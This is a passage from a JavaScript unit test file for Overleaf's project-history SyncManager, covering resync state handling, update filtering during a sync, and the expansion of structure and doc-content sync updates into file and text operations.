meta: { + ts: TIMESTAMP, + }, + } +} + +function makeComment(commentId, pos, text) { + return { + id: commentId, + op: { p: pos, c: text, t: commentId }, + metadata: { + 
user_id: USER_ID, + ts: TIMESTAMP, + }, + } +} + +function makeTrackedChange(id, op) { + return { + id, + op, + metadata: { user_id: USER_ID, ts: TIMESTAMP }, + } +} + +describe('SyncManager', function () { + beforeEach(async function () { + this.now = new Date() + tk.freeze(this.now) + this.projectId = new ObjectId().toString() + this.historyId = 'mock-overleaf-id' + this.syncState = { origin: { kind: 'history-resync' } } + this.db = { + projectHistorySyncState: { + findOne: sinon.stub().resolves(this.syncState), + updateOne: sinon.stub().resolves(), + }, + } + this.extendLock = sinon.stub().resolves() + + this.LockManager = { + promises: { + runWithLock: sinon.stub().callsFake(async (key, runner) => { + await runner(this.extendLock) + }), + }, + } + + this.UpdateCompressor = { + diffAsShareJsOps: sinon.stub().returns([]), + } + + this.UpdateTranslator = { + isTextUpdate: sinon.stub(), + _convertPathname: sinon.stub(), + } + + this.WebApiManager = { + promises: { + getHistoryId: sinon.stub(), + requestResync: sinon.stub().resolves(), + }, + } + this.WebApiManager.promises.getHistoryId + .withArgs(this.projectId) + .resolves(this.historyId) + + this.ErrorRecorder = { + promises: { + record: sinon.stub().resolves(), + recordSyncStart: sinon.stub().resolves(), + }, + } + + this.RedisManager = {} + + this.SnapshotManager = { + promises: { + getLatestSnapshotFilesForChunk: sinon.stub(), + }, + } + + this.HistoryStoreManager = { + getBlobStore: sinon.stub(), + _getBlobHashFromString: sinon.stub().returns('random-hash'), + } + + this.HashManager = { + _getBlobHashFromString: sinon.stub(), + } + + this.Metrics = { inc: sinon.stub() } + + this.Settings = { + redis: { + lock: { + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:${projectId}` + }, + }, + }, + }, + } + + this.SyncManager = await esmock(MODULE_PATH, { + '../../../../app/js/LockManager.js': this.LockManager, + '../../../../app/js/UpdateCompressor.js': this.UpdateCompressor, + '../../../../app/js/UpdateTranslator.js': this.UpdateTranslator, + '../../../../app/js/mongodb.js': { ObjectId, db: this.db }, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/ErrorRecorder.js': this.ErrorRecorder, + '../../../../app/js/RedisManager.js': this.RedisManager, + '../../../../app/js/SnapshotManager.js': this.SnapshotManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/HashManager.js': this.HashManager, + '@overleaf/metrics': this.Metrics, + '@overleaf/settings': this.Settings, + }) + }) + + afterEach(function () { + tk.reset() + }) + + describe('startResync', function () { + describe('if a sync is not in progress', function () { + beforeEach(async function () { + this.db.projectHistorySyncState.findOne.resolves({}) + await this.SyncManager.promises.startResync(this.projectId) + }) + + it('takes the project lock', function () { + expect(this.LockManager.promises.runWithLock).to.have.been.calledWith( + `ProjectHistoryLock:${this.projectId}` + ) + }) + + it('gets the sync state from mongo', function () { + expect(this.db.projectHistorySyncState.findOne).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) } + ) + }) + + it('requests a resync from web', function () { + expect( + this.WebApiManager.promises.requestResync + ).to.have.been.calledWith(this.projectId) + }) + + it('sets the sync state in mongo and prevents it expiring', function () { + expect( + this.db.projectHistorySyncState.updateOne + 
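+ // $unset: expiresAt (asserted below) clears any TTL on the state document so it cannot expire mid-resync; an expiry is only set again when the sync ends.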
).to.have.been.calledWith( + { + project_id: new ObjectId(this.projectId), + }, + sinon.match({ + $set: { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }, + $currentDate: { lastUpdated: true }, + $inc: { resyncCount: 1 }, + $unset: { expiresAt: true }, + }), + { + upsert: true, + } + ) + }) + }) + + describe('if project structure sync is in progress', function () { + beforeEach(function () { + const syncState = { resyncProjectStructure: true } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('returns an error if already syncing', async function () { + await expect( + this.SyncManager.promises.startResync(this.projectId) + ).to.be.rejectedWith('sync ongoing') + }) + }) + + describe('if doc content sync is in progress', function () { + beforeEach(async function () { + const syncState = { resyncDocContents: ['/foo.tex'] } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('returns an error if already syncing', async function () { + await expect( + this.SyncManager.promises.startResync(this.projectId) + ).to.be.rejectedWith('sync ongoing') + }) + }) + }) + + describe('setResyncState', function () { + describe('when the sync is starting', function () { + beforeEach(function () { + this.syncState = { + toRaw() { + return { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + }, + isSyncOngoing: sinon.stub().returns(true), + } + }) + + it('sets the sync state in mongo and prevents it expiring', async function () { + // SyncState is a private class of SyncManager + // we know the interface however: + await this.SyncManager.promises.setResyncState( + this.projectId, + this.syncState + ) + + expect( + this.db.projectHistorySyncState.updateOne + ).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) }, + sinon.match({ + $set: this.syncState.toRaw(), + $currentDate: { lastUpdated: true }, + $inc: { resyncCount: 1 }, + $unset: { expiresAt: true }, + }), + { upsert: true } + ) + }) + }) + + describe('when the sync is ending', function () { + beforeEach(function () { + this.syncState = { + toRaw() { + return { + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + }, + isSyncOngoing: sinon.stub().returns(false), + } + }) + + it('sets the sync state entry in mongo to expire', async function () { + await this.SyncManager.promises.setResyncState( + this.projectId, + this.syncState + ) + + expect( + this.db.projectHistorySyncState.updateOne + ).to.have.been.calledWith( + { project_id: new ObjectId(this.projectId) }, + sinon.match({ + $set: { + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + expiresAt: new Date(this.now.getTime() + 90 * 24 * 3600 * 1000), + }, + $currentDate: { lastUpdated: true }, + }), + { upsert: true } + ) + }) + }) + + describe('when the new sync state is null', function () { + it('does not update the sync state in mongo', async function () { + // SyncState is a private class of SyncManager + // we know the interface however: + await this.SyncManager.promises.setResyncState(this.projectId, null) + expect(this.db.projectHistorySyncState.updateOne).to.not.have.been + .called + }) + }) + }) + + describe('skipUpdatesDuringSync', function () { + describe('if a sync is not in progress', function () { + beforeEach(async function () { + this.db.projectHistorySyncState.findOne.resolves({}) + this.updates = ['some', 'mock', 'updates']
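+ // No sync state is stored for the project, so the updates should pass through unchanged.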
this.result = await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + this.updates + ) + }) + + it('returns all updates', function () { + expect(this.result.updates).to.deep.equal(this.updates) + }) + + it('should not return any newSyncState', function () { + expect(this.result.syncState).to.be.null + }) + }) + + describe('if a sync is in progress', function () { + beforeEach(function () { + this.renameUpdate = { + pathname: 'old.tex', + newPathname: 'new.tex', + } + this.projectStructureSyncUpdate = { + resyncProjectStructure: { + docs: [{ path: 'new.tex' }], + files: [], + }, + } + this.textUpdate = { + doc: new ObjectId(), + op: [{ i: 'a', p: 4 }], + meta: { + pathname: 'new.tex', + doc_length: 4, + }, + } + this.docContentSyncUpdate = { + path: 'new.tex', + resyncDocContent: { + content: 'a', + }, + } + this.UpdateTranslator.isTextUpdate + .withArgs(this.renameUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.projectStructureSyncUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.docContentSyncUpdate) + .returns(false) + this.UpdateTranslator.isTextUpdate + .withArgs(this.textUpdate) + .returns(true) + + const syncState = { + resyncProjectStructure: true, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + } + this.db.projectHistorySyncState.findOne.resolves(syncState) + }) + + it('remove updates before a project structure sync update', async function () { + const updates = [ + this.renameUpdate, + this.textUpdate, + this.projectStructureSyncUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('records docs to resync when resyncProjectStructureOnly=true is not set', async function () { + const updates = [this.projectStructureSyncUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('records no docs to resync with resyncProjectStructureOnly=true', async function () { + this.projectStructureSyncUpdate.resyncProjectStructureOnly = true + const updates = [this.projectStructureSyncUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([this.projectStructureSyncUpdate]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + + it('allow project structure updates after project structure sync update', async function () { + const updates = [this.projectStructureSyncUpdate, this.renameUpdate] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.renameUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false,
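+ // 'new.tex' is recorded for a follow-up doc content resync because the structure update listed it as a doc.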
resyncDocContents: ['new.tex'], + origin: { kind: 'history-resync' }, + }) + }) + + it('remove text updates for a doc before doc sync update', async function () { + const updates = [ + this.projectStructureSyncUpdate, + this.textUpdate, + this.docContentSyncUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + + it('allow text updates for a doc after doc sync update', async function () { + const updates = [ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + this.textUpdate, + ] + const { updates: filteredUpdates, syncState } = + await this.SyncManager.promises.skipUpdatesDuringSync( + this.projectId, + updates + ) + + expect(filteredUpdates).to.deep.equal([ + this.projectStructureSyncUpdate, + this.docContentSyncUpdate, + this.textUpdate, + ]) + expect(syncState.toRaw()).to.deep.equal({ + resyncProjectStructure: false, + resyncDocContents: [], + origin: { kind: 'history-resync' }, + }) + }) + }) + }) + + describe('expandSyncUpdates', function () { + beforeEach(function () { + this.persistedDoc = { + doc: 'doc-id', + path: 'main.tex', + } + this.persistedDocContent = 'the quick brown fox jumps over the lazy dog' + this.persistedFile = { + file: 'file-id', + path: '1.png', + _hash: 'abcde', + } + this.loadedSnapshotDoc = File.fromString(this.persistedDocContent) + this.mostRecentChunk = 'fake chunk' + this.fileMap = { + 'main.tex': { + isEditable: sinon.stub().returns(true), + getContent: sinon.stub().returns(null), + getHash: sinon.stub().returns(null), + load: sinon.stub().resolves(this.loadedSnapshotDoc), + getMetadata: sinon.stub().returns({}), + }, + '1.png': { + isEditable: sinon.stub().returns(false), + data: { hash: this.persistedFile._hash }, + getMetadata: sinon.stub().returns({}), + }, + } + this.UpdateTranslator._convertPathname + .withArgs('main.tex') + .returns('main.tex') + this.UpdateTranslator._convertPathname + .withArgs('/main.tex') + .returns('main.tex') + this.UpdateTranslator._convertPathname + .withArgs('another.tex') + .returns('another.tex') + this.UpdateTranslator._convertPathname.withArgs('1.png').returns('1.png') + this.UpdateTranslator._convertPathname.withArgs('2.png').returns('2.png') + this.SnapshotManager.promises.getLatestSnapshotFilesForChunk.resolves( + this.fileMap + ) + }) + + it('returns updates if no sync updates are queued', async function () { + const updates = ['some', 'mock', 'updates'] + const expandedUpdates = await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.equal(updates) + expect(this.SnapshotManager.promises.getLatestSnapshotFilesForChunk).to + .not.have.been.called + expect(this.extendLock).to.not.have.been.called + }) + + describe('expanding project structure sync updates', function () { + it('queues nothing for expected docs and files', async function () { + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + 
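+ // The snapshot and the resync update describe the same docs and files, so no corrective operations are expected.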
expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file removes for unexpected files', async function () { + const updates = [resyncProjectStructureUpdate([this.persistedDoc], [])] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedFile.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues doc removes for unexpected docs', async function () { + const updates = [resyncProjectStructureUpdate([], [this.persistedFile])] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedDoc.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing regular files', async function () { + const newFile = { + path: '2.png', + file: {}, + url: 'filestore/2.png', + _hash: 'hash-42', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + url: newFile.url, + hash: 'hash-42', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing regular files w/o url', async function () { + const newFile = { + path: '2.png', + file: {}, + _hash: 'hash-42', + createdBlob: true, + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + hash: 'hash-42', + createdBlob: true, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues file additions for missing linked files', async function () { + const newFile = { + path: '2.png', + file: {}, + url: 'filestore/2.png', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + _hash: 'hash-42', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile, newFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newFile.path, + file: newFile.file, + url: newFile.url, + hash: 'hash-42', + metadata: { + importedAt: '2024-07-30T09:14:45.928Z', + provider: 'references-provider', + }, + meta: { + resync: true, + ts: 
TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('queues blank doc additions for missing docs', async function () {
+        const newDoc = {
+          path: 'another.tex',
+          doc: new ObjectId().toString(),
+        }
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc, newDoc],
+            [this.persistedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: newDoc.path,
+            doc: newDoc.doc,
+            docLines: '',
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('removes and re-adds files if their binary state differs', async function () {
+        const fileWhichWasADoc = {
+          path: this.persistedDoc.path,
+          url: 'filestore/2.png',
+          _hash: 'other-hash',
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate(
+            [],
+            [fileWhichWasADoc, this.persistedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: fileWhichWasADoc.path,
+            new_pathname: '',
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+          {
+            pathname: fileWhichWasADoc.path,
+            file: fileWhichWasADoc.file,
+            url: fileWhichWasADoc.url,
+            hash: 'other-hash',
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('removes and re-adds linked-files if their binary state differs', async function () {
+        const fileWhichWasADoc = {
+          path: this.persistedDoc.path,
+          url: 'filestore/references.txt',
+          _hash: 'other-hash',
+          metadata: {
+            importedAt: '2024-07-30T09:14:45.928Z',
+            provider: 'references-provider',
+          },
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate(
+            [],
+            [fileWhichWasADoc, this.persistedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: fileWhichWasADoc.path,
+            new_pathname: '',
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+          {
+            pathname: fileWhichWasADoc.path,
+            file: fileWhichWasADoc.file,
+            url: fileWhichWasADoc.url,
+            hash: 'other-hash',
+            metadata: {
+              importedAt: '2024-07-30T09:14:45.928Z',
+              provider: 'references-provider',
+            },
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('adds linked file data with the same hash', async function () {
+        const nowLinkedFile = {
+          path: this.persistedFile.path,
+          url: 'filestore/1.png',
+          _hash: this.persistedFile._hash,
+          metadata: {
+            importedAt: '2024-07-30T09:14:45.928Z',
+            provider: 'image-provider',
+          },
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate([this.persistedDoc], [nowLinkedFile]),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: nowLinkedFile.path,
+            metadata: {
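+              // Only a metadata update is expected here: nowLinkedFile carries
+              // the same _hash as the snapshot's '1.png', so no remove/re-add
+              // pair is queued and just the linked-file data is attached.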
importedAt: '2024-07-30T09:14:45.928Z',
+              provider: 'image-provider',
+            },
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('updates linked file data when hash remains the same', async function () {
+        this.fileMap[this.persistedFile.path].getMetadata.returns({
+          importedAt: '2024-07-30T09:14:45.928Z',
+          provider: 'image-provider',
+        })
+        const updatedLinkedFile = {
+          path: this.persistedFile.path,
+          url: 'filestore/1.png',
+          _hash: this.persistedFile._hash,
+          metadata: {
+            importedAt: '2024-07-31T00:00:00.000Z',
+            provider: 'image-provider',
+          },
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [updatedLinkedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: updatedLinkedFile.path,
+            metadata: {
+              importedAt: '2024-07-31T00:00:00.000Z',
+              provider: 'image-provider',
+            },
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('removes linked file data', async function () {
+        this.fileMap[this.persistedFile.path].getMetadata.returns({
+          importedAt: '2024-07-30T09:14:45.928Z',
+          provider: 'image-provider',
+        })
+
+        const noLongerLinkedFile = {
+          path: this.persistedFile.path,
+          url: 'filestore/1.png',
+          _hash: this.persistedFile._hash,
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [noLongerLinkedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: noLongerLinkedFile.path,
+            metadata: {},
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it("does not remove and re-add files if the expected file doesn't have a hash", async function () {
+        const fileWhichWasADoc = {
+          path: this.persistedDoc.path,
+          url: 'filestore/2.png',
+        }
+
+        const updates = [
+          resyncProjectStructureUpdate(
+            [],
+            [fileWhichWasADoc, this.persistedFile]
+          ),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('does not remove and re-add editable files if there is a binary file with same hash', async function () {
+        const binaryFile = {
+          file: Object().toString(),
+          // The paths in the resyncProjectStructureUpdate must have a leading slash ('/')
+          // The other unit tests in this file are incorrectly missing the leading slash.
+          // The leading slash is present in web where the paths are created with
+          // ProjectEntityHandler.getAllEntitiesFromProject in ProjectEntityUpdateHandler.resyncProjectHistory.
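+          // For example, the _convertPathname stubs in the beforeEach map both
+          // 'main.tex' and '/main.tex' to 'main.tex', so either spelling
+          // resolves to the same snapshot entry.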
+ path: '/' + this.persistedDoc.path, + url: 'filestore/12345', + _hash: 'abcdef', + } + this.fileMap['main.tex'].data = { hash: 'abcdef' } + + const updates = [ + resyncProjectStructureUpdate([], [binaryFile, this.persistedFile]), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds binary files if they do not have same hash', async function () { + const persistedFileWithNewContent = { + _hash: 'anotherhashvalue', + hello: 'world', + path: '1.png', + url: 'filestore-new-url', + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [persistedFileWithNewContent] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: persistedFileWithNewContent.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: persistedFileWithNewContent.path, + file: persistedFileWithNewContent.file, + url: persistedFileWithNewContent.url, + hash: 'anotherhashvalue', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('removes and re-adds binary files w/o url if they do not have same hash', async function () { + const persistedFileWithNewContent = { + _hash: 'anotherhashvalue', + hello: 'world', + path: '1.png', + createdBlob: true, + } + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [persistedFileWithNewContent] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: persistedFileWithNewContent.path, + new_pathname: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + pathname: persistedFileWithNewContent.path, + file: persistedFileWithNewContent.file, + hash: 'anotherhashvalue', + createdBlob: true, + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('preserves other updates', async function () { + const update = { mock: 'update' } + const updates = [ + update, + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([update]) + expect(this.extendLock).to.have.been.called + }) + }) + + describe('expanding doc contents sync updates', function () { + it('returns errors from diffAsShareJsOps', async function () { + const diffError = new Error('test') + this.UpdateCompressor.diffAsShareJsOps.throws(diffError) + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent), + ] + await expect( + this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + 
this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+        ).to.be.rejectedWith(diffError)
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('handles an update for a file that is missing from the snapshot', async function () {
+        const updates = [docContentSyncUpdate('not-in-snapshot.txt', 'test')]
+        await expect(
+          this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+        ).to.be.rejectedWith('unrecognised file: not in snapshot')
+      })
+
+      it('queues nothing for docs whose content is in sync', async function () {
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [this.persistedFile]
+          ),
+          docContentSyncUpdate(this.persistedDoc, this.persistedDocContent),
+        ]
+        this.UpdateCompressor.diffAsShareJsOps.returns([])
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('queues text updates for docs whose content is out of sync', async function () {
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [this.persistedFile]
+          ),
+          docContentSyncUpdate(
+            this.persistedDoc,
+            'the fox jumps over the lazy dog'
+          ),
+        ]
+        this.UpdateCompressor.diffAsShareJsOps.returns([
+          { d: 'quick brown ', p: 4 },
+        ])
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            doc: this.persistedDoc.doc,
+            op: [{ d: 'quick brown ', p: 4 }],
+            meta: {
+              pathname: this.persistedDoc.path,
+              doc_length: this.persistedDocContent.length,
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('queues text updates for docs created by project structure sync', async function () {
+        this.UpdateCompressor.diffAsShareJsOps.returns([{ i: 'a', p: 0 }])
+        const newDoc = {
+          path: 'another.tex',
+          doc: new ObjectId().toString(),
+        }
+        const newDocContent = 'a'
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc, newDoc],
+            [this.persistedFile]
+          ),
+          docContentSyncUpdate(newDoc, newDocContent),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
+            this.extendLock
+          )
+
+        expect(expandedUpdates).to.deep.equal([
+          {
+            pathname: newDoc.path,
+            doc: newDoc.doc,
+            docLines: '',
+            meta: {
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+          {
+            doc: newDoc.doc,
+            op: [{ i: 'a', p: 0 }],
+            meta: {
+              pathname: newDoc.path,
+              doc_length: 0,
+              resync: true,
+              ts: TIMESTAMP,
+              origin: { kind: 'history-resync' },
+            },
+          },
+        ])
+        expect(this.extendLock).to.have.been.called
+      })
+
+      it('skips text updates for docs when hashes match', async function () {
+        this.fileMap['main.tex'].getHash.returns('special-hash')
+        this.HashManager._getBlobHashFromString.returns('special-hash')
+        const updates = [
+          resyncProjectStructureUpdate(
+            [this.persistedDoc],
+            [this.persistedFile]
+          ),
+          docContentSyncUpdate(this.persistedDoc, 'hello'),
+        ]
+        const expandedUpdates =
+          await this.SyncManager.promises.expandSyncUpdates(
+            this.projectId,
+            this.historyId,
+            this.mostRecentChunk,
+            updates,
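+            // extendLock is asserted in every test here, presumably so that
+            // the caller's project lock stays alive while expansion does slow
+            // work such as loading snapshot file contents.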
